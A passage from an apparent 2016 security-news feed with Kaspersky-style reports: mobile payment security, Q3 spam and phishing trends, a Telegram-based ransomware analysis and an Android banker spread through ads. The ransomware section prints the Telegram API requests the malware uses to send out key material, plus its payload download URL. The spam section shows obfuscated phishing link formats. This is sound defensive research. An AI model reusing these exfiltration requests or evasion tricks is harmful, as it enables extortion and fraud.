  • Criminals may attempt to DDoS the website of your shop for blackmail purposes. Make sure that your IT security team is prepared for such attacks or, if you don’t have one, ask your hosting provider if it is possible to purchase a DDoS-protection service from them.
  • Educate your clients on possible cyberthreats they may encounter while shopping online and offline
For financial organizations
  • Introduce enterprise-wide fraud prevention strategy with special sections on ATM and internet banking security. Logical security, physical security of ATMs and fraud prevention measures should be addressed altogether as attacks are becoming more complex.
  • Conduct annual security audits and penetration tests. It is better to let professionals find vulnerabilities than wait until they will be found by cybercriminals.
  • Choose a multi-layered approach and techniques against fraud. Training employees to spot suspicious transactions should be combined with implementation of dedicated fraud prevention solutions. Financial security software based on innovative technologies helps to detect and fight fraudulent activity beyond human control.
  • Do not leave self-protection to customers. It is hardly possible to educate all customers – and it is always better to create a multi-layer security architecture that will provide all the services with the necessary level of security.
  • Remember that insiders are usually involved in half or more cybersecurity incidents. Use security approaches that allow for the detection of suspicious and potentially dangerous activity inside your infrastructure.
  • Make sure that your anti-fraud department is fully staffed during the holiday period.

Anti-Virus

SANS Tip of the Day - Mon, 11/14/2016 - 00:00
Make sure you have anti-virus software installed on your computer and that it is automatically updating. However, keep in mind that no anti-virus can catch all malware; your computer can still be infected. That is why it's so important you use common sense and be wary of any messages that seem odd or suspicious.

Loop of Confidence

Malware Alerts - Thu, 11/10/2016 - 04:10

With the arrival of Apple Pay and Samsung Pay in Russia, many are wondering just how secure these payment systems are, and how popular they are likely to become. A number of experts have commented on this, basing their opinions on the common stereotypes of Android being insecure and the attacks which currently take place on wireless payments. In our opinion however, these technologies require a more detailed examination and a separate evaluation of the threats they face.

The conventional approach

Traditional threats associated with the use of bank cards in ATMs and physical stores have already been studied and described in sufficient detail:

  • the magnetic strip can be read using skimmers; modern versions of skimmers are advanced and very inconspicuous;
  • to read EMV chips, dedicated skimmers have been designed that are planted into payment terminals;
  • wireless payment systems (PayPass, PayWave) are potentially vulnerable to contactless, remote card reading attacks.

However, the growth in popularity of mobile devices has given rise to a new type of wireless mobile payment: a regular card payment can now be emulated using the smartphone’s built-in NFC antenna. The functionality is turned on at the request of the user, meaning there’s less risk than carrying around a card that’s constantly ready to make a payment. Bank clients, in turn, don’t have to take out their wallets when making a payment, and don’t even have to carry their bank cards around with them.

The technology for emulating cards on mobile devices (Host Card Emulation, HCE) may have been inexpensive and available to a broad range of device users starting from Android 4.4, but it had several drawbacks:

  • the payment terminal had to support wireless payments;
  • the eSE (embedded Secure Element) chip made the device more expensive, so initially it was incorporated into just a few top-of-the-range devices from major manufacturers;
  • if the manufacturer decided to cut costs on secure data storage, important information ended up being stored by the operating system which could be attacked by malware with root privileges on the device. However, this didn’t go beyond a few proof-of-concept attacks, because there are plenty of other easier ways of attacking mobile banking systems;
  • the developers attempted to mitigate the risks associated with storing important payment information on a mobile device, e.g. by using secure element in the cloud. This made smartphone-assisted payments unavailable in locations with unstable mobile services;
  • the risks associated with using software-based HCE storage made it highly advisable to introduce extra security measures into banking applications, making their development more complicated.

As a result, for many large banks, as well as users, paying with the help of card emulation using a smartphone is little more than a quirky feature used for promos or simply to show off in public.

New technologies

The problems described above have given rise to a number of studies, including some by large international companies, in search of more advanced technologies. The next step in the evolution of mobile payments was tokenized payment systems proposed by major market players – Apple, Samsung, and Google. Unlike card emulation on the device, these systems are based on exchanging tokens. A token is a unique transaction ID; the card details are never sent to the payment terminal. This addresses the problem of payment terminals being compromised by malware or skimmers. Unfortunately, this approach has the same problem: the technology has to be adopted and maintained by the manufacturer of the payment terminal.

Several years ago, a startup project called LoopPay attempted to address this problem. The developers proposed a kit consisting of a regular card reader for a 3.5 mm (1⁄8 in) audio jack and a phone case. Their know-how was a patented technology for emulating a bank card magnetic strip using a signal generated by their dedicated device. It has to be said that the creators took an early interest in secure data storage (on a dedicated device rather than on the phone) and protection from using the details of other people’s bank cards (personal data checked by comparing information about the user against information from the bank card’s Track 1 information). Later on, Samsung became interested in LoopPay and acquired the startup. After some time, the Magnetic Secure Transmission (MST) technology became available, complementing Samsung Pay tokenized payments. As a result, regular users can use their smartphones to make payments at payment terminals that support new wireless payment technologies and use MST at any type of terminal by just placing their device next to the magnetic strip reader.

We have been monitoring this project closely, and can now safely say that this technology is, on the whole, a big step forward in terms of convenience and security, because its developers have addressed lots of relevant risks:

  • secure element is used to reliably store data;
  • activation of payment mode on the phone requires the user to enter a PIN code or use a fingerprint;
  • on Samsung devices, a KNOX security solution and basic antivirus are pre-installed – these two block payment features when malware lands on the device;
  • KNOX Tamper Switch – an object of hate among forum-based “experts” – protects against more serious rootkit malware. KNOX Tamper Switch is a software and hardware appliance that irreversibly blocks the device’s business and payment features during any privilege escalation attacks;
  • payment functionality is only available from new devices for which security updates are available, and on which all vulnerabilities are quickly patched;
  • on some of the Samsung smartphones sold in Russia, Kaspersky Internet Security for Android is pre-installed. This provides extended protection from viruses and other mobile threats.

It should be noted that Samsung Pay, when making payments, uses a virtual card whose number is not available to the user, rather than the actual banking card tied to the user’s account. This method of payment works just fine when there is no Internet connection.

New old threats

There’s no doubt that the new technology has become an object of interest for security researchers. Potential attacks do exist for it and were presented at the latest BlackHat USA conference. These attacks may still only be potential threats, but we should still stay alert. Banks are just planning to introduce biometric authentication on ATMs in 2017, but cybercriminals are already collecting intelligence on which hardware manufacturers are involved, what sort of vulnerabilities exist in the hardware, etc. In other words, the technology is not even available to the wider public yet, but cybercriminals are already searching for weaknesses.

Cybercriminals are also studying Apple and Samsung’s technologies. To makes things worse for Russian users, these technologies only arrive in the Russian market a year after they are launched in Western countries.

Cybercriminals discussing the prospects of exploiting Apple Pay in Russia

At the same time, cybersecurity researchers tend to forget about conventional fraud, which mobile vendors are completely unprepared for as they enter a new sphere of business. Wireless payments have made card fraudsters’ lives much easier both in terms of online trade and shopping in regular stores. They no longer have to use a fake card with stolen card data recorded onto it, and thus run the risk of getting caught at the shop counter – now they can play it much safer by paying for merchandise with a stolen card attached to a top-of-the-range phone.

Alternatively, a fraudster can simply buy merchandise and gift cards in an Apple Store. In spite of all the security measures taken by Apple, the Apple Pay fraud rate in the US was 6% in 2015, or 60 times greater than the 0.1% bank card fraud.

Samsung Pay also sacrificed some of the useful anti-fraud features for usability after it purchased the startup; one being that accounts be rigidly attached to the cardholder’s name. For instance, I added my own bank card to my smartphone, and then added my colleague’s as well; in the original LoopPay solution, this was impossible.

To conclude, it’s now safe to say that the new tokenized solutions are indeed more secure and convenient compared to their predecessors. However, there’s still plenty of room for improvement when it comes to security, and that’s very important for the future prospects of the technology. After all, no one likes to lose money, be it banks or their clients.

Spam and phishing in Q3 2016

Malware Alerts - Wed, 11/09/2016 - 05:00

 Download the full report (PDF)

Spam: quarterly highlights Malicious spam

Throughout 2016 we have registered a huge amount of spam with malicious attachments; in the third quarter, this figure once again increased significantly. According to KSN data, in Q3 2016 the number of email antivirus detections totaled 73,066,751. Most malicious attachments contained Trojan downloaders that one way or another loaded ransomware onto the victim’s computer.

Number of email antivirus detections, Q1-Q3 2016

The amount of malicious spam reached its peak in September 2016. According to our estimates, the number of mass mailings containing the Necurs botnet alone amounted to 6.5% of all spam in September. To recap, this kind of malicious spam downloads the Locky malware to computers.

Most emails were neutral in nature. Users were prompted to open malicious attachments imitating bills supposedly sent by a variety of organizations, receipts, tickets, scans of documents, voice messages, notifications from stores, etc. Some messages contained no text at all. All this is consistent with recent trends in spam: fraudsters are now less likely to try and impress or intimidate users to make them click a malicious link or open an attachment. Instead, spammers try to make the email contents look normal, indistinguishable from other personal correspondence. Cybercriminals appear to believe that a significant proportion of users have mastered the basics of Internet security and can spot a fake threat, so malicious attachments are made to look like everyday mail.

Of particular note is the fact that spam coming from the Necurs botnet had a set pattern of technical email headers, while the schemes used by the Locky cryptolocker varied a lot. For example, the five examples above contain the following four patterns:

  • JavaScript loader in a ZIP archive loads and runs Locky.
  • Locky is loaded using a macro in the .docm file.
  • Archived HTML page with a JavaScript script downloads Locky.
  • Archived HTML page with a JavaScript script downloads the encrypted object Payload.exe, which runs Locky after decryption.
Methods and tricks: links in focus IP obfuscation

The third quarter saw spammers continue to experiment with obfuscated links. This well-known method of writing IP addresses in hexadecimal and octal systems was updated by scammers who began to add ‘noise’. As a result, an IP address in a link may end up looking like this:

HTTP://@[::ffff:d598:a862]:80/

Spammers also began to insert non-alphanumeric symbols and slashes in domain/IP addresses, for example:

http://0122.0142.0xBABD/

<a href=/@/0x40474B17

URL shortening services

Spammers also continued experimenting with URL shortening services, inserting text between slashes. For example:

Sometimes other links were used to add text noise:

The use of search queries

Some spammers have returned to the old method of hiding the addresses of their sites as search queries. This allows them to solve two problems: it bypasses black lists and makes the links unique for each email. In the third quarter, however, spammers went even further and used the Google option “I’m Feeling Lucky”. This option immediately redirects users to the website that’s displayed first in the list of search results, and it can be activated simply by adding “&btnI=ec” to the end of the link. Clicking on the link redirects users to the spammer’s site rather than to the page displayed in the Google search results. The advertising site itself is obviously optimized to appear first in the search results. There could be lots of similar queries within a single mass mailing.

The example above involves yet another trick. The search query is written in Cyrillic. The Cyrillic letters are first converted to a decimal format (e.g., “авто” becomes “Авто”), and then the whole query in decimal format, including special symbols, are converted to a hexadecimal URL format.

Imitations of popular sites

The third quarter saw phishers trying to cheat users by making a link look similar to that of a legitimate site. This trick is as old as the hills. In the past, real domain names were distorted very slightly; now, cybercriminals make use of either subdomains imitating real domain names or long domains with hyphens. So, in phishing attacks on PayPal users we came across the following domain names:

Phishing attacks targeting Apple users included the following names:

Spammers have also found help from new “descriptive” domain zones, where a fake link can seem more topical and trusted, for example:

Testers required

Q3 email traffic contained mass mailings asking users to participate in free testing of a product that they could then keep. The authors of the emails we analyzed were offering popular goods such as expensive brand-name home appliances (coffee machines, robot vacuum cleaners), cleaning products, cosmetics and even food. We also came across a lot of emails offering the chance to test the latest models of electronic devices including the new iPhone that was released at the end of the third quarter. The headers used in these mass mailings include: “Register to test & keep a new iPhone 7S! Wanted:! IPhone 7S Testers”. The release of the latest iPhone was met with the usual surge of spam activity dedicated exclusively to Apple products.

The largest percentage of spam in the third quarter – 61.25% – was registered in September #KLReport

Tweet

The people sending out these messages are in no way related to the companies whose products they use as bait. Moreover, they send out their mass mailings from fake email addresses or from empty, newly created domains.

The senders promise to deliver the goods for testing by post, and using this pretext they ask for the recipient’s postal and email addresses as well as other personal information. A small postal charge in is imposed on the user, but even if the goods are delivered, there is no guarantee they will be good quality. There are lots of posts on the Internet by users saying they never received any goods, even after paying the postage costs. This has an element of old-fashioned non-virtual fraud: the cybercriminals receive money transfers under the pretext of a postal charges and then disappear.

Gift certificates to suit all tastes

Spam traffic in Q3 included some interesting mailings using the common theme of fake gift certificates. Recipients were offered the chance to participate in an online survey in return for a certificate worth anything from ten to hundreds of euros or dollars. They were led to believe that the certificates were valid for large international retail chains, online hypermarkets, grocery stores, popular fast-food chains as well as gas stations.

In some cases, the senders of these fraudulent messages said they were carrying out a survey to improve the customer support services of the organizations that were allegedly behind these generous offers, as well as to improve the quality of their products. In other cases, the message was described as a stroke of luck and that the recipient’s email address was randomly selected for a generous gift as a mark of appreciation for using the brand’s goods or services. The messages were indeed randomly sent out to email addresses that had been collected by spammers, and did not necessarily belong to customers of the companies named in emails.

To confirm receipt of the gift certificate, the user is asked to follow a link in the email which in fact leads to an empty domain with a descriptive name (e.g. “winner of the day”). Then, via the redirect, the user ends up at a newly created site with a banner designed in the style of the brand that supposedly sent out the mailing. The user is notified that the number of certificates is limited and that they have only 90 seconds to click on a link, thereby agreeing to receive the gift. After completing a short survey asking things such as “How often do you use our services?” and “How are you planning to use the certificate?” the user is asked to enter their personal data in a form. And finally the “lucky winner” is redirected to a secure payment page where they have to enter their bank card details and pay a minor fee (in the case we analyzed the sum was 1 krone).

In Q3 2016 Germany (13.21%) remained the country targeted most by malicious mailshots #KLReport

Tweet

According to online reviews, some potential victims of this type of certificate fraud were asked to call a number to participate in a telephone survey rather than an online survey. This type of fraudulent scheme is also quite common: the idea is to keep someone on the paid line for as long as possible until they give up on the promised reward.

Like the offers to participate in the testing of goods, these themed messages were sent out from fake addresses with empty or newly created domains that had nothing to do with the organizations in whose name the cybercriminals were offering the certificates.

Statistics Proportion of spam in email traffic

Percentage of spam in global email traffic, Q2 and Q3 2016

The largest percentage of spam in the third quarter – 61.25% – was registered in September. The average share of spam in global email traffic for Q3 amounted to 59.19%, which was 2 p.p. more than in the previous quarter.

Sources of spam by country

Sources of spam by country, Q3 2016

In Q3 2016, the contribution from India increased considerably – by 4 p.p. – and became the biggest source of spam with a share of 14.02%. Vietnam (11.01%, +1 p.p.) remained in second place. The US fell to third after its share (8.88%) dropped by 1.9 p.p.

As in the previous quarter, fourth and fifth were occupied by China (5.02%) and Mexico (4.22%) respectively, followed by Brazil (4.01%), Germany (3.80%) and Russia (3.55%). Turkey (2.95%) rounded off the TOP 10.

Spam email size

Breakdown of spam emails by size, Q2 and Q3 2016

Traditionally, the most commonly distributed emails are very small – up to 2 KB (55.78%), although the proportion of these emails has been declining throughout the year, and in Q3 dropped by 16 p.p. compared to the previous quarter. Meanwhile, the proportion of emails sized 10-20 KB increased considerably from 10.66% to 21.19%. The other categories saw minimal changes.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the TOP 10 malware families to trigger mail antivirus.

TOP 10 malware families

Trojan-Downloader.JS.Agent (9.62%) once again topped the rating of the most popular malware families. Trojan-Downloader.JS.Cryptoload (2.58%) came second. Its share increased by 1.34 p.p. As in the previous quarter, Trojan-Downloader.MSWord.Agent (2.34%) completed the top three.

The popular Trojan-Downloader.VBS.Agent family (1.68%) fell to fourth with a 0.48 p.p. decline. It was followed by Trojan.Win32.Bayrob (0.94%).

TOP 10 malware families in Q3 2016

A number of newcomers made it into the bottom half of this TOP 10. Worm.Win32.WBVB (0.60%) in seventh place includes executable files written in Visual Basic 6 (in both P-code and Native modes) that are not recognized as trusted by KSN. The malware samples of this family are only detected by Mail Anti-Virus. For this type of verdict File Antivirus only detects objects with names that are likely to mislead users, for example, AdobeFlashPlayer, InstallAdobe, etc.

In Q3 2016 India (14.02%) became the biggest source of spam #KLReport

Tweet

Trojan.JS.Agent (0.54%) came eighth. A typical representative of this family is a file with .wsf, .html, .js and other extensions. The malware is used to collect information about the browser, operating system and software whose vulnerabilities can be used. If the desired vulnerable software is found, the script tries to run a malicious script or an application via a specified link.

Yet another newcomer – Trojan-Downloader.MSWord.Cryptoload (0.52%) – occupied ninth place. It is usually a document with a .doc or .docx extension containing a script that can be executed in MS Word (Visual Basic for Applications). The script includes procedures for establishing a connection, downloading, saving and running a file – usually a Trojan cryptor.

Trojan.Win32.Agent (0,51%), which was seventh in the previous quarter, rounded off the TOP 10 in the third quarter.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q3 2016

Germany (13.21%) remained the country targeted most by malicious mailshots, although its share continued to decline – by 1.48 p.p. in Q3. Japan (8.76%), whose share increased by 2.36 p.p., moved up to second. China (8.37%) in third saw its share drop by 5.23 p.p.

In Q3 2016, fourth place was occupied by Russia (5.54%); its contribution increased by 1.14 p.p. from the previous quarter. Italy came fifth with a share of 5.01%. The US remained in seventh (4.15%). Austria (2.54%) rounded off this TOP 10.

Phishing

In Q3 2016, the Anti-Phishing system was triggered 37,515,531 times on the computers of Kaspersky Lab users, which is 5.2 million more than the previous quarter. Overall, 7.75% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q3 2016.

Geography of attacks

China (20.21%) remained the country where the largest percentage of users is affected by phishing attacks. In Q3 2016, the proportion of those attacked increased by 0.01 p.p.

Geography of phishing attacks*, Q3 2016

*Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 0.4 p.p. and accounted for 18.23%, placing the country second in this rating. UAE added 0.88 p.p. to the previous quarter’s figure and came third with 11.07%. It is followed by Australia (10.48%, -2.29 p.p.) and Saudi Arabia (10.13%, +1.5 p.p.).

TOP 10 countries by percentage of users attacked:

China 20.21% Brazil 18.23% United Arab Emirates 11.07% Australia 10.48% Saudi Arabia 10.13% Algeria 10.07% New Zealand 9.7% Macau 9.67% Palestinian Territory 9.59% South Africa 9.28%

The share of attacked users in Russia amounted to 7.74% in the third quarter. It is followed by Canada (7.16%), the US (6.56%) and the UK (6.42%).

Organizations under attack Rating the categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q3 of 2016, the share of the ‘Financial organizations’ category (banks, payment systems, online stores) accounted for more than half of all registered attacks. The percentage of the ‘Banks’ category increased by 1.7 p.p. and accounted for 27.13%. The proportion of ‘Online stores’ (12.21%) and ‘Payment systems’ (11.55%) increased by 2.82 p.p. and 0.31 p.p. respectively.

Distribution of organizations affected by phishing attacks by category, Q3 2016

In addition to financial organizations, phishers most often attacked ‘Global Internet portals’ (21.73%), ‘Social networking sites’ (11.54%) and ‘Telephone and Internet service providers’ (4.57%). However, their figures remained almost unchanged from the previous quarter – the change for each category was no more than a single percentage point.

Hot topics this quarter Attacks on users of online banking

The third quarter saw the proportion of attacked users in the ‘Banks’ category increase significantly – by 1.7 p.p. The four banks whose clients were attacked most often are all located in Brazil. For several years in a row this country has ranked among the countries with the highest proportion of users attacked by phishers, and occasionally occupies first place. Naturally, online banking users are priority targets for cybercriminals, since the financial benefits of a successful attack are self-evident.

Links to fake banking pages are mostly spread via email.

Example of a phishing email sent on behalf of a Brazilian bank. The link in the email leads to a fake page that imitates the login page to the user’s banking account

‘Porn virus’ for Facebook users

At the beginning of the previous quarter, Facebook users were subjected to phishing attacks. Almost half a year later, the same scheme was used by fraudsters to attack users in Europe. During the attack, a provocative adult video was used as bait. To view it, the user was directed to a fake page (a page on the xic.graphics domain was especially popular) imitating the popular YouTube video portal.

Example of a user being tagged in a post with the video

This extension requested rights to read all the data in the browser, potentially giving the cybercriminals access to passwords, logins, credit card details and other confidential user information. The extension also distributed more links on Facebook that directed to itself, but which were sent using the victim’s name.

Phisher tricks

Carrying on from the second quarter, we continue to talk about the popular tricks of Internet fraudsters. The objectives are simple – to convince their victims that they are using legitimate resources and to bypass security software filters. It is often the case that the more convincing the page is for the victim, the easier it is to detect with a variety of technologies for combating fraudsters.

Nice domains

We have already described a trick whereby spammers use genuine-looking links in emails to spread phishing content. Fraudsters often resort to this technique regardless of how the phishing page is distributed. They are trying to mislead users, who do actually pay attention to the address in the address bar, but who are not technically savvy enough to see the catch.

The main domain of the organization that is being attacked might be represented, for example, by a 13th-level domain:

Or might simply be used in combination with another relevant word, e.g., secure:

These tricks help deceive potential victims, though they make it much easier to detect phishing attacks using security solutions.

Different languages for different victims

By using information about the IP address of a potential victim, phishers determine the country in which they are located. In the example below, they do so by using the service http://www.geoplugin.net/json.gp?ip=.

Depending on the country that has been identified, the cybercriminals will display pages with vocabulary in the corresponding language.

Examples of files that are used to display a phishing page in a specified language

The example below shows 11 different versions of pages for 32 different locations:

Example of a script used by phishers to display the relevant page depending on the location of the victim

TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies.

The TOP 3 organizations attacked most frequently by phishers accounted for 21.96% of all phishing links detected in Q3 2016.

Organization % of detected phishing links Facebook 8.040955 Yahoo! 7.446908 Amazon.com 6.469801

In Q3 2016, Facebook (8.1%, +0.07 p.p.) topped the ranking of organizations used by fraudsters to hide their attacks. Microsoft, the leader in the previous quarter, dropped out of the TOP 3. Second place was occupied by Yahoo! (7.45%), whose contribution increased by 0.38 p.p. Third place went to Amazon, a newcomer to the TOP 3 with 6.47%.

Conclusion

In the third quarter of 2016, the proportion of spam in email traffic increased by 2 p.p. compared to the previous quarter and accounted for 59.19%. The largest percentage of spam – 61.25% – was registered in September. India (14.02%), which was only fourth in the previous quarter, became the biggest source of spam. The top three sources also included Vietnam (11.01%) and the US (8.88%).

The top three countries targeted by malicious mailshots remained unchanged from the previous quarter. Germany (13.21%) came first again, followed by Japan (8.76%) and China (8.37%).

In Q3 2016, Kaspersky Lab products prevented over 37.5 million attempts to enter phishing sites, which is 5.2 million more than the previous quarter. Financial organizations were the main target, with banks the worst affected, accounting for 27.13% of all registered attacks. The most attractive phishing targets in Q3 2016 were clients of four banks located in Brazil.

The first cryptor to exploit Telegram

Malware Alerts - Tue, 11/08/2016 - 05:52

Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.

What is a cryptor?

In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.

There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.

Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.

Analyzing the Telegram Trojan

The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).

Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.

In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.

The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.

The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:

https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

The Trojan sends the following parameters in the request:

<chat> – number of the chat with the cybercriminal;

<computer_name> – name of the infected computer;

<infection_id> – infection ID;

<key_seed> – number used as a basis to generate the file encryption key.

After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.

File extensions selected for encryption

Depending on its configuration, the Trojan may add the extension ‘.Xcri’ to the encrypted files, or leave the extension unchanged. The Trojan’s sample that we analyzed does not change file extensions. A list of encrypted files is saved to the text file ‘%USERPROFILE%\Desktop\База зашифр файлов.txt’.

After encryption, the Trojan sends the request https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop.

In this request, all parameters are the same as in the previous request, but the word ‘stop’ is added at the end.

Then the Trojan downloads the extra module Xhelp.exe (URL: http://***.ru/wp-includes/random_compat/Xhelp.exe) from a compromised site created using WordPress, and launches it. This module, called “Informer” (‘Информатор’ in the original Russian) by the cybercriminals, has a graphical interface and informs the victim about what has happened, and puts forward the ransom demand. The ransom is 5,000 RUB which is accepted via Qiwi or Yandex.Money payment methods.

Screens demonstrated to the victim user

The victim can communicate with the cybercriminals via a dedicated entry field in the “Informer” interface. This feature is also based on sending a Telegram message using the method ‘sendMessage’.

Multiple language mistakes in the ransom texts suggest the grade level of the Trojan’s creators. There is also a final phrase which catches the attention: “Thank you for helping Young Programmers Fund”.

Safeguarding measures

All Kaspersky Lab products detect this threat with the following verdicts:

Trojan-Ransom.Win32.Telecrypt
PDM:Trojan.Win32.Generic

MD5:

3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (the main module)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (the ‘Informer’ module).

If you have fallen victim to this encryption malware, we strongly advise you not to pay the ransom. Instead, contact Kaspersky Lab’s support team and we will help you decrypt your files.

Disassembling a Mobile Trojan Attack

Malware Alerts - Mon, 11/07/2016 - 05:27

In early August we detected several cases of a banking Trojan being downloaded automatically when users viewed certain news sites on their Android devices. Later it became apparent that this was being caused by advertising messages from the Google AdSense network, and was not restricted to news sites. In fact, any site using AdSense to display adverts could potentially have displayed messages that downloaded the dangerous Trojan-Banker.AndroidOS.Svpeng and automatically saved it to the device’s SD card. This behavior surprised us: typically, the browser warns users about downloading a potentially dangerous file, and offers them a choice of whether or not to save the file. We intercepted traffic coming from the attacked device when this sort of “advert” was displayed, and figured out how the malicious program was downloaded and automatically saved.

Some statistics

First of all, let’s provide some information about the latest versions of Trojan-Banker.AndroidOS.Svpeng. It is limited to Russia and the CIS (more about this later). Below is a graph showing detections of the Trojan’s latest version – Svpeng.q.

And here is the graph for the previous version that was distributed in July 2016, also via AdSense:

As you can see from the graphs, within a two-month period Svpeng was detected on the computers of approximately 318,000 users, with the detection rate peaking at around 37,000 attacked users in one day. The high rates and abrupt changes in the number of detections are easy to explain: Google has been quick to block the ads that the Trojan uses for propagation. However, this is a reactive rather than a proactive approach – the malicious ads were blocked after the Trojan was already on thousands of Android devices. It is also worth noting that there were multiple occasions in the past two months when these ads found their way on to AdSense; similar attacks have been occurring up to the present time, with the most recent attack registered on 12 September 2016.

Now for the juicy part

Let’s look at how the displaying of an ad is related to the automatic download of the APK file containing the Trojan and it being saved to the SD card. Below is the HTTP request that leads to the cybercriminals’ advert being displayed:

In response to this request, the server sends a Javascript script that displays the ad message. However, this script contains a hidden surprise: at the beginning there is some heavily obfuscated code. Let’s look, step by step, at what this code actually does:

  1. Declares the variables necessary for operation and deciphers the payload:
  2. We can see that the APK file was downloaded in the form of an encrypted array of bytes in the script. Now it just needs to be saved to the SD card.

  3. Defines the function that will save the file.
  4. The code checks the availability of functions from various browser engines, and if they are unavailable, defines its own function. The object URL and the element <a> (the latter being an HTML notation for a link) are created in this function. The resulting link is assigned the attribute ‘href’ (where the link leads to), and the malicious program emulates a click on this link. This method is not new; quite possibly the Trojan’s creators borrowed it from here, and only added obfuscation and a restriction: the click simulation is only done on touchscreen devices, which for the most part are smartphones.

  5. Breaks the decrypted APK file into blocks of 1024 bytes.
  6. Sets the handler for a page load event. Handler activation initiates the automatic saving of the APK file to the SD card.

Apart from the extra checks to see if the script runs on the smartphone or not, there is an important check in the code to identify the language used on the device. The attackers only target smartphones with a Russian-language interface – these are typically devices belonging to users in Russia and, to a lesser degree, CIS states.

Where’s the catch?

The method described above only works in Google Chrome for Android. When an APK file is downloaded via a link leading to an external web resource, the browser displays a warning that a potentially dangerous object is being downloaded, and prompts the user to choose whether or not to save the file.

When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user.

We notified Google about this browser behavior and that it was being exploited to distribute malicious content. At the time of publishing a patch had been released that fixed this problem in Google Chrome and will become available to users the next time the browser is updated.

In all other browsers, this method either does not work, or the user is asked if they want to save the file or not. Kaspersky Lab recommends updating Google Chrome to prevent infection by the malware when viewing sites that use AdSense.

Conclusion

Of course, just downloading the Trojan is not enough for it to work; the user also has to install it. To ensure this, the attackers resort to social engineering. The Trojan may be downloaded with any of the following names:

  • last-browser-update.apk
  • WhatsApp.apk
  • Google_Play.apk
  • 2GIS.apk
  • Viber.apk
  • DrugVokrug.apk
  • Instagram.apk
  • VKontakte.apk
  • minecraftPE.apk
  • Skype.apk
  • Android_3D_Accelerate.apk.
  • SpeedBoosterAndr6.0.apk
  • new-android-browser.apk
  • AndroidHDSpeedUp.apk
  • Android_update_6.apk
  • WEB-HD-VIDEO-Player.apk
  • Asphalt_7_Heat.apk
  • CHEAT.apk
  • Root_Uninstaller.apk
  • Mobogenie.apk
  • Chrome_update.apk
  • Trial_Xtreme.apk
  • Cut_the_Rope_2.apk
  • Установка.apk
  • Temple_Run.apk

These names imitate the names of popular legitimate apps or try to convince users that the downloaded app is important and has to be installed. In the latest versions of Android, installation of apps downloaded from unknown sources is blocked by default, but the cybercriminals are obviously counting on users disabling this setting to install an “important browser update” or a newer version of a popular app that is already on their phone.

So far, those behind Svpeng have limited their attacks to smartphone users in Russia. However, next time they push their “adverts” on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past. After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?

Patch and Update

SANS Tip of the Day - Fri, 11/04/2016 - 01:00
One of the most effective ways you can protect your computer at home is to make sure both the operating system and your applications are patched and updated. Enable automatic updating whenever possible.

IT threat evolution Q3 2016. Statistics

Malware Alerts - Thu, 11/03/2016 - 06:59

 Download the full report (PDF)

Statistics

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q3 figures
  • According to KSN data, Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.
  • 45,169,524 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects: scripts, exploits, executable files, etc.
  • Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,198,264 user computers.
  • Crypto ransomware attacks were blocked on 821,865 computers of unique users.
  • Kaspersky Lab’s file antivirus detected a total of 116,469,744 unique malicious and potentially unwanted objects.
  • Kaspersky Lab mobile security products detected:
    • 1,520,931 malicious installation packages;
    • 30,167 mobile banker Trojans (installation packages);
    • 37,150 mobile ransomware Trojans (installation packages).
Mobile threats Q3 events Pokémon GO: popular with users and hackers

